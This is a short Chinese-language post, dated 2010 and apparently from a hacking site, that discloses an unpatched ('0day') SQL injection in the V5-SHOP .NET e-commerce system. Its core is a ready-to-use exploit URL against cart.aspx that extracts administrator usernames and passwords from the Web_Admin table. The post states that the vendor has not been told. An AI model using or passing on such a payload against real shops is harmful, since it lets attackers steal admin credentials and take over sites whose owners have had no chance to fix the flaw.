浏览模式: 标准 | 列表Tag:v5shop
V5-SHOP商城0day
Submitted by admin
2010, August 6, 10:43 PM
因为是.net 程序,
此漏洞可威胁服务器安全,
暂且发布暴管理帐号信息,
影响版本:只测试最新的,旧版本也测试了几个,都OK。
程序介绍:.net 的在线商城系统
以下是测试EXP:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 –
暂未通知官方修补。
转载请注名本站原创!!
本篇文章来源于 Any_size|反入侵小组 原文链接:http://www.17hack.com/news/sort02/News-1219.html